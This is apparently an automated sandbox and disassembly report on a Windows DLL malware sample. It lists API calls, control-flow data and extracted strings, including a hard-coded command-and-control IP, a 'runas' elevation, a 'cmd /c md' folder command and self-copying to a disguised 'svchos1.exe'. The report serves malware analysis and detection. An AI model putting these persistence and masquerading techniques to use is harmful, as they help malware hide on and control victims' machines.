                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$HandleService$Close$CreateDescriptorExitOpenProcessSecuritySleepThreadsprintf$#823AddressCommandCurrentDaclErrorFileInitializeLastLibraryLineLoadLocalManagerMessageModuleMutexObjectPostProcSingleStartTimeWaitstrstr
                                                  • String ID: -acsi$%$%$%$%$%$%$.$.$1.0$2$2$2$2$27.124.13.32$3$3$A$A$A$A$A$A$A$A$A$A$A$A$A$A$C$C$D$D$D$D$Default$E$E$E$E$F$F$F$F$G$G$G$G$Global\$I$I$K$L$L$M$M$N$P$P$R$S$S$S$S$S$S$S$S$T$V$a$a$a$a$a$a$a$a$a$b$b$c$c$c$c$c$d$d$d$g$g$g$g$g$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$o$o$o$open$p$p$p$p$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$v$v$v$x$y
                                                  • API String ID: 351596864-2051936253
                                                  • Opcode ID: 7cfb272ffc672da6afd5aede38ad53784937d8f556f49564fdb200ff2c99d4ed
                                                  • Instruction ID: e598048d8765cd451969394599f29611a38b066dbb3f57a00738bf0a26127158
                                                  • Opcode Fuzzy Hash: 7cfb272ffc672da6afd5aede38ad53784937d8f556f49564fdb200ff2c99d4ed
                                                  • Instruction Fuzzy Hash: 1B82057050C3C0DDE332C7688848BDFBED5ABA6708F48499DE5CC4A292D7BA5648C767

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 91 10014700-1001487f LoadLibraryA GetProcAddress #823 * 2 RegOpenKeyExA 92 10014881-10014894 call 10014c12 91->92 93 10014899-1001489f 91->93 120 10014c28-10014c53 #825 * 2 92->120 95 100148a5 93->95 96 100149ab-100149b7 call 10014c12 93->96 95->96 99 10014a03-10014a29 RegQueryValueExA 95->99 100 100148c2-100148ec RegQueryValueExA 95->100 101 10014ba2-10014bcd wsprintfA 95->101 102 100149a4 95->102 103 10014908-10014932 RegQueryValueExA 95->103 104 100148ac-100148b5 95->104 105 10014acc-10014b3e RegEnumValueA 95->105 106 10014bcf-10014bd4 95->106 107 10014a30-10014a72 RegEnumKeyExA 95->107 108 10014bf5-10014c0d lstrcatA 95->108 109 10014bd6 95->109 110 10014b58-10014b7b wsprintfA 95->110 111 10014b7d-10014ba0 wsprintfA 95->111 112 100149bc-100149e6 RegQueryValueExA 95->112 96->120 99->96 116 10014a2b 99->116 100->96 122 100148f2-10014906 call 10010c70 100->122 101->108 102->96 103->96 113 10014934-10014943 103->113 104->96 121 100148bb 104->121 105->96 118 10014b44-10014b4b 105->118 119 10014bdb-10014bf2 wsprintfA 106->119 107->96 117 10014a78-10014ac7 wsprintfA 107->117 109->119 110->108 111->108 112->96 115 100149e8-10014a01 wsprintfA 112->115 123 10014949-1001494c 113->123 115->102 116->102 117->107 118->108 124 10014b51 118->124 119->108 121->96 121->99 121->100 121->101 121->103 121->106 121->108 121->109 121->110 121->111 121->112 129 10014986-100149a2 122->129 126 10014980 123->126 127 1001494e-1001497e strncat * 2 strchr 123->127 124->101 124->106 124->108 124->109 124->110 124->111 126->129 127->123 129->102
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                  • #823.MFC42(?), ref: 10014763
                                                  • #823.MFC42(?,?), ref: 100147DA
                                                  • RegOpenKeyExA.KERNELBASE(00000000,1011EF78,00000000,00020019,?), ref: 1001487A
                                                    • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                    • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                  • #825.MFC42(?), ref: 10014C2F
                                                  • #825.MFC42(?,?), ref: 10014C38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823#825Close$AddressLibraryLoadOpenProc
                                                  • String ID: %-24s %-$%-24s %-15$'%','-','2','4','s',' ','%','-','1','5','s',' ','0','x','%','x','(','%','d',')',' ','','r','','n','$15s $ADVAPI32.dll$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$RegOpenKeyExA$[%s]$s %s
                                                  • API String ID: 625772149-2764046103
                                                  • Opcode ID: e9b759d37e0c66c0df496332eaefc290cfeed51a7f80094c371127e5d0bc3a1a
                                                  • Instruction ID: 115d8fe143d75db12af3cc1d4cb921bc2dd74b9ce9cee776de7a3c65cacdb907
                                                  • Opcode Fuzzy Hash: e9b759d37e0c66c0df496332eaefc290cfeed51a7f80094c371127e5d0bc3a1a
                                                  • Instruction Fuzzy Hash: B8E1A0B29005189BDB14CFA8CC84AEFB7B9FB88310F554359F61AA72D0DB759E44CB90

                                                  Control-flow Graph

                                                  APIs
                                                  • _access.MSVCRT ref: 1002141D
                                                    • Part of subcall function 100209D0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                    • Part of subcall function 100209D0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                    • Part of subcall function 100209D0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10021449
                                                  • ShellExecuteExA.SHELL32(?), ref: 10021491
                                                  • GetLastError.KERNEL32 ref: 10021497
                                                  • exit.MSVCRT ref: 100214A1
                                                  • _access.MSVCRT ref: 100214D0
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                  • _access.MSVCRT ref: 100214F6
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                  • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                  • _access.MSVCRT ref: 10021517
                                                  • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                  • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                  • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                  • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                  • Shellex.ZFJHEGHDDQ ref: 1002157D
                                                    • Part of subcall function 1001EFD0: #823.MFC42(00000849), ref: 1001EFDF
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                    • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$_access$CloseCreateExecHandleSleepThread$#823AllocateCheckErrorExecuteFileFreeInitializeLastMembershipModuleNameShellShellexTokenexit
                                                  • String ID: 27.124.13.32$<$C:\Users\Public\Documents\MM$C:\Users\Public\Documents\MM\svchos1.exe$cmd /c md C:\Users\Public\Documents\MM$runas
                                                  • API String ID: 2771109159-2199693279
                                                  • Opcode ID: 57971e8e777e08cc5b984256a566b691be1509acad0c6cfa31ad497dc34f7eb7
                                                  • Instruction ID: fa9292524b20ab7b5a18679751402b284409ad25d9f2df2877a3ef4a3abf2d47
                                                  • Opcode Fuzzy Hash: 57971e8e777e08cc5b984256a566b691be1509acad0c6cfa31ad497dc34f7eb7
                                                  • Instruction Fuzzy Hash: 48313939640315A7F620E778AC81FCE3694EF907A0F940625F759BB1D0DBB4E84046A6

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001ABCC
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC0A
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC1A
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC2A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC31
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                  • String ID: C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                  • API String ID: 1069036285-2757848780
                                                  • Opcode ID: f2a9626cffd51e9a6d2c40dc870c808525a412725241cf90750e580c4fe7a4f8
                                                  • Instruction ID: 0a72392bf4b0a200e4bd61a90f2bf89fbd88cb95a26b4720dd27f9ac0debc74a
                                                  • Opcode Fuzzy Hash: f2a9626cffd51e9a6d2c40dc870c808525a412725241cf90750e580c4fe7a4f8
                                                  • Instruction Fuzzy Hash: AF31B831108790AFE311CB28CC54B9BBBD9EBC9704F444A1CFA99572D1D7766A04CB66

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10021410: _access.MSVCRT ref: 1002141D
                                                  • _access.MSVCRT ref: 100214D0
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                  • _access.MSVCRT ref: 100214F6
                                                  • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                  • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                  • _access.MSVCRT ref: 10021517
                                                  • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                  • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                  • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                  • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                  • Shellex.ZFJHEGHDDQ ref: 1002157D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _access$CloseCreateExecHandleSleepThread$Shellex
                                                  • String ID: 27.124.13.32$C:\Users\Public\Documents\MM$cmd /c md C:\Users\Public\Documents\MM
                                                  • API String ID: 4276510029-3007588180
                                                  • Opcode ID: c1933e08cffc611bd4b2444f6616772dc35ab6b6c909ce2c826781a29803ef26
                                                  • Instruction ID: 452f8436f2e35dc7cd81f777670ae57d519e3dfd0eeeebd5b163114b503f7789
                                                  • Opcode Fuzzy Hash: c1933e08cffc611bd4b2444f6616772dc35ab6b6c909ce2c826781a29803ef26
                                                  • Instruction Fuzzy Hash: 8B11CD39780725B2F530E3B86C82FDE2544DB907A0F650771F7597F1C0DAA4BC4046AA

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,1011EF78,75570F00,0000005C,00000000,00000000,75570F00,1001FEC4), ref: 1002BDDE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BDE7
                                                  • CreateThread.KERNELBASE(?,?,1002BCB0,?,?,?), ref: 1002BE15
                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL,WaitForSingleObject,?,?,?,?,?,?,?,?,?), ref: 1002BE27
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BE2A
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1002BE3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$CloseCreateHandleThread
                                                  • String ID: CreateEventA$KERNEL32.DLL$KERNEL32.dll$WaitForSingleObject
                                                  • API String ID: 2992130774-1666596002
                                                  • Opcode ID: 5440b0ab951838d2cbe3370a1a700e9c7badd980ebb7237285be3df9d805e187
                                                  • Instruction ID: 8a4cc49f2d02f0bdb3570f0d77f4d2b1bb3eb8ff579d6897090658656d56d732
                                                  • Opcode Fuzzy Hash: 5440b0ab951838d2cbe3370a1a700e9c7badd980ebb7237285be3df9d805e187
                                                  • Instruction Fuzzy Hash: 32110C75608315AFD640DFA88C84F9BBBE8EBC8354F544A0DF698D3351C674E9058BA2

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 10020F30: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011FA48,?,?,1002152D), ref: 10020F8C
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,1002152D), ref: 10020F93
                                                  • GetLastError.KERNEL32(?,?,1002152D), ref: 10020F9F
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011FA30,00000000,?,?,1002152D), ref: 10020FB2
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP60(?,?,?,?,1002152D), ref: 10020FBD
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,?,?,1002152D), ref: 10020FC4
                                                  Strings
                                                  • C:\Users\Public\Documents\MM\svchos1.exe, xrefs: 10020F70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@?endl@std@@D@std@@@0@D@std@@@1@V10@V21@@$??6?$basic_ostream@D@std@@@std@@ErrorFileLastModuleNameV01@
                                                  • String ID: C:\Users\Public\Documents\MM\svchos1.exe
                                                  • API String ID: 481592904-2345221083
                                                  • Opcode ID: a9c9f4f36b18d4392aaf16a2b8c9324bef32de2e2dd0107f7e80bb18ea79e5d7
                                                  • Instruction ID: 5f12666beba628ea540994bdd3e4d638e6fa14ea03cf00141ba3f8848090bad7
                                                  • Opcode Fuzzy Hash: a9c9f4f36b18d4392aaf16a2b8c9324bef32de2e2dd0107f7e80bb18ea79e5d7
                                                  • Instruction Fuzzy Hash: 23E065B8A503106BE745A7F4AC8D99A3AE8FF5050670C1978FD0EE6161EB39D350D711

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 184 10020f30-10020f4a GetModuleFileNameA 185 10020f53-10020f6e CopyFileA 184->185 186 10020f4c-10020f52 184->186
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                  • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10020F62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CopyModuleName
                                                  • String ID:
                                                  • API String ID: 4108865673-0
                                                  • Opcode ID: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                  • Instruction ID: 93f4a3cd88c2ae214515ddcb3b57ab60d0dfeb708720a14bb37e431ebb366a02
                                                  • Opcode Fuzzy Hash: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                  • Instruction Fuzzy Hash: BCE012F95443006BF314DB58DCC6FE636A8BB80B00FC44918F79C851D0E6F59598C662

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 187 10014c12-10014c27 RegCloseKey * 2
                                                  APIs
                                                  • RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                  • RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                  • Instruction ID: cb428774d1c23af65b3502e581b01568c295d1083760601ce9be51a3606d3d50
                                                  • Opcode Fuzzy Hash: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                  • Instruction Fuzzy Hash: 8BB09B759240389BDF54DB64DC449C937687B48200B050586B51CA3150C931AD808F90
                                                  APIs
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 1000A591
                                                  • LoadLibraryA.KERNEL32 ref: 1000A5A9
                                                  • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 1000A5C1
                                                  • GetProcAddress.KERNEL32(00000000,AllocateAndGetUdpExTableFromStack), ref: 1000A5CB
                                                  • GetProcAddress.KERNEL32(00000000,InternalGetTcpTable2), ref: 1000A5E7
                                                  • GetProcessHeap.KERNEL32(00000001), ref: 1000A602
                                                  • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000AD8C
                                                  • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000ADAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
